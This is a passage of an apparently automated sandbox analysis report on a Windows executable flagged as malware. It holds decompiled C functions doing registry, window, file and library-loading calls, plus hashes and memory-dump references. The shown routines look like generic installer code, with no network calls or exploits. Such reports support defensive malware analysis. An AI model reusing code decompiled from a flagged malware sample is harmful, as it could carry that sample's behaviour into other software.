                                                                                        • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: d1dff4d776bca0a2222a44f31909631fa7d7d15c67e191e3b4827a22de1aff4b
                                                                                        • Instruction ID: 877201eb1fde92c018b748f946bef73c88a7f4494613f525a58053556f51a1dc
                                                                                        • Opcode Fuzzy Hash: d1dff4d776bca0a2222a44f31909631fa7d7d15c67e191e3b4827a22de1aff4b
                                                                                        • Instruction Fuzzy Hash: DA410671A442D4DECF319E684DA83DB7BA35F26350FD8406ACCC68B205DB344A87CB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E0040252A(int* __ebx, char* __edi) {
                                                                                        				void* _t17;
                                                                                        				short* _t18;
                                                                                        				void* _t35;
                                                                                        				void* _t37;
                                                                                        				void* _t40;
                                                                                        
                                                                                        				_t33 = __edi;
                                                                                        				_t27 = __ebx;
                                                                                        				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                                        				_t35 = _t17;
                                                                                        				_t18 = E00402DA6(0x33);
                                                                                        				 *__edi = __ebx;
                                                                                        				if(_t35 == __ebx) {
                                                                                        					 *(_t37 - 4) = 1;
                                                                                        				} else {
                                                                                        					 *(_t37 - 0x10) = 0x800;
                                                                                        					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                        						L7:
                                                                                        						 *_t33 = _t27;
                                                                                        						 *(_t37 - 4) = 1;
                                                                                        					} else {
                                                                                        						if( *(_t37 + 8) == 4) {
                                                                                        							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                        							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                        							E00406484(__edi,  *__edi);
                                                                                        						} else {
                                                                                        							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                        								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                        								_t33[0x7fe] = _t27;
                                                                                        							} else {
                                                                                        								goto L7;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t35); // executed
                                                                                        					RegCloseKey(); // executed
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                                        				return 0;
                                                                                        			}








                                                                                        0x0040252a
                                                                                        0x0040252a
                                                                                        0x0040252f
                                                                                        0x00402536
                                                                                        0x00402538
                                                                                        0x0040253f
                                                                                        0x00402542
                                                                                        0x0040292e
                                                                                        0x00402548
                                                                                        0x0040254b
                                                                                        0x00402566
                                                                                        0x00402596
                                                                                        0x00402596
                                                                                        0x00402599
                                                                                        0x00402568
                                                                                        0x0040256c
                                                                                        0x00402585
                                                                                        0x0040258c
                                                                                        0x0040258f
                                                                                        0x0040256e
                                                                                        0x00402571
                                                                                        0x0040257c
                                                                                        0x004025f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402571
                                                                                        0x0040256c
                                                                                        0x004025fc
                                                                                        0x004025fd
                                                                                        0x004025fd
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiF917.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3356406503-0
                                                                                        • Opcode ID: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
                                                                                        • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                        • Opcode Fuzzy Hash: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
                                                                                        • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 69%
                                                                                        			E00401389(signed int _a4) {
                                                                                        				intOrPtr* _t6;
                                                                                        				void* _t8;
                                                                                        				void* _t10;
                                                                                        				signed int _t11;
                                                                                        				void* _t12;
                                                                                        				signed int _t16;
                                                                                        				signed int _t17;
                                                                                        				void* _t18;
                                                                                        
                                                                                        				_t17 = _a4;
                                                                                        				while(_t17 >= 0) {
                                                                                        					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                                        					if( *_t6 == 1) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_push(_t6); // executed
                                                                                        					_t8 = E00401434(); // executed
                                                                                        					if(_t8 == 0x7fffffff) {
                                                                                        						return 0x7fffffff;
                                                                                        					}
                                                                                        					_t10 = E0040136D(_t8);
                                                                                        					if(_t10 != 0) {
                                                                                        						_t11 = _t10 - 1;
                                                                                        						_t16 = _t17;
                                                                                        						_t17 = _t11;
                                                                                        						_t12 = _t11 - _t16;
                                                                                        					} else {
                                                                                        						_t12 = _t10 + 1;
                                                                                        						_t17 = _t17 + 1;
                                                                                        					}
                                                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                        						 *0x433eec =  *0x433eec + _t12;
                                                                                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                                                        					}
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}











                                                                                        0x0040138a
                                                                                        0x004013fa
                                                                                        0x0040139b
                                                                                        0x004013a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004013a2
                                                                                        0x004013a3
                                                                                        0x004013ad
                                                                                        0x00000000
                                                                                        0x00401404
                                                                                        0x004013b0
                                                                                        0x004013b7
                                                                                        0x004013bd
                                                                                        0x004013be
                                                                                        0x004013c0
                                                                                        0x004013c2
                                                                                        0x004013b9
                                                                                        0x004013b9
                                                                                        0x004013ba
                                                                                        0x004013ba
                                                                                        0x004013c9
                                                                                        0x004013cb
                                                                                        0x004013f4
                                                                                        0x004013f4
                                                                                        0x004013c9
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                        • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                        • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                        • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402434(void* __ebx) {
                                                                                        				void* _t10;
                                                                                        				void* _t14;
                                                                                        				long _t18;
                                                                                        				intOrPtr _t20;
                                                                                        				void* _t22;
                                                                                        				void* _t23;
                                                                                        
                                                                                        				_t14 = __ebx;
                                                                                        				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                        				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                        				if( *(_t23 - 0x20) != __ebx) {
                                                                                        					_t18 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1);
                                                                                        					goto L4;
                                                                                        				} else {
                                                                                        					_t10 = E00402DE6(_t26, 2); // executed
                                                                                        					_t22 = _t10;
                                                                                        					if(_t22 == __ebx) {
                                                                                        						L6:
                                                                                        						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                        					} else {
                                                                                        						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                                        						RegCloseKey(_t22);
                                                                                        						L4:
                                                                                        						if(_t18 != _t14) {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                                        				return 0;
                                                                                        			}









                                                                                        0x00402434
                                                                                        0x00402434
                                                                                        0x00402437
                                                                                        0x0040243a
                                                                                        0x0040247b
                                                                                        0x00000000
                                                                                        0x0040243c
                                                                                        0x0040243e
                                                                                        0x00402443
                                                                                        0x00402447
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x0040244d
                                                                                        0x0040245d
                                                                                        0x0040245f
                                                                                        0x0040247d
                                                                                        0x0040247f
                                                                                        0x00000000
                                                                                        0x00402485
                                                                                        0x0040247f
                                                                                        0x00402447
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteValue
                                                                                        • String ID:
                                                                                        • API String ID: 2831762973-0
                                                                                        • Opcode ID: 97360b955b635c9890ae9d9b0f1e57c96b00ae30c81411ee80960667b0035cbd
                                                                                        • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                                        • Opcode Fuzzy Hash: 97360b955b635c9890ae9d9b0f1e57c96b00ae30c81411ee80960667b0035cbd
                                                                                        • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableShow
                                                                                        • String ID:
                                                                                        • API String ID: 1136574915-0
                                                                                        • Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                                                        • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                        • Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                                                        • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00401573(void* __ebx) {
                                                                                        				int _t4;
                                                                                        				void* _t9;
                                                                                        				struct HWND__* _t11;
                                                                                        				struct HWND__* _t12;
                                                                                        				void* _t16;
                                                                                        
                                                                                        				_t9 = __ebx;
                                                                                        				_t11 =  *0x433ed0; // 0x1043e
                                                                                        				if(_t11 != __ebx) {
                                                                                        					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
                                                                                        					_t4 =  *(_t16 - 0x30);
                                                                                        				}
                                                                                        				_t12 =  *0x433ee4; // 0x10438
                                                                                        				if(_t12 != _t9) {
                                                                                        					ShowWindow(_t12, _t4); // executed
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
                                                                                        				return 0;
                                                                                        			}








                                                                                        0x00401573
                                                                                        0x00401573
                                                                                        0x00401581
                                                                                        0x00401587
                                                                                        0x00401589
                                                                                        0x00401589
                                                                                        0x0040158c
                                                                                        0x00401594
                                                                                        0x0040159c
                                                                                        0x0040159c
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • ShowWindow.USER32(0001043E,?), ref: 00401587
                                                                                        • ShowWindow.USER32(00010438), ref: 0040159C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
                                                                                        • Instruction ID: a156d7c756385a3c588793d51facb92f34767ed8181f20582b2048d309791e4b
                                                                                        • Opcode Fuzzy Hash: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
                                                                                        • Instruction Fuzzy Hash: 25E04F76B101149BCB05DFA8ED908AEB3A6EB84311314483BE502B3290D675AD048B18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040690A(signed int _a4) {
                                                                                        				struct HINSTANCE__* _t5;
                                                                                        				signed int _t10;
                                                                                        
                                                                                        				_t10 = _a4 << 3;
                                                                                        				_t8 =  *(_t10 + 0x40a3e0);
                                                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                        				if(_t5 != 0) {
                                                                                        					L2:
                                                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                        				}
                                                                                        				_t5 = E0040689A(_t8); // executed
                                                                                        				if(_t5 == 0) {
                                                                                        					return 0;
                                                                                        				}
                                                                                        				goto L2;
                                                                                        			}





                                                                                        0x00406912
                                                                                        0x00406915
                                                                                        0x0040691c
                                                                                        0x00406924
                                                                                        0x00406930
                                                                                        0x00000000
                                                                                        0x00406937
                                                                                        0x00406927
                                                                                        0x0040692e
                                                                                        0x00000000
                                                                                        0x0040693f
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                          • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                          • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                          • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2547128583-0
                                                                                        • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                        • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                        • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                        • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 68%
                                                                                        			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                                        				signed int _t5;
                                                                                        				void* _t6;
                                                                                        
                                                                                        				_t5 = GetFileAttributesW(_a4); // executed
                                                                                        				asm("sbb ecx, ecx");
                                                                                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                        				return _t6;
                                                                                        			}





                                                                                        0x00406031
                                                                                        0x0040603e
                                                                                        0x00406053
                                                                                        0x00406059

                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00406008(WCHAR* _a4) {
                                                                                        				signed char _t3;
                                                                                        				signed char _t7;
                                                                                        
                                                                                        				_t3 = GetFileAttributesW(_a4); // executed
                                                                                        				_t7 = _t3;
                                                                                        				if(_t7 != 0xffffffff) {
                                                                                        					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}





                                                                                        0x0040600d
                                                                                        0x00406013
                                                                                        0x00406018
                                                                                        0x00406021
                                                                                        0x00406021
                                                                                        0x0040602a

                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                        • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                        • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405AEB(WCHAR* _a4) {
                                                                                        				int _t2;
                                                                                        
                                                                                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                        				if(_t2 == 0) {
                                                                                        					return GetLastError();
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}




                                                                                        0x00405af1
                                                                                        0x00405af9
                                                                                        0x00000000
                                                                                        0x00405aff
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                        • GetLastError.KERNEL32 ref: 00405AFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
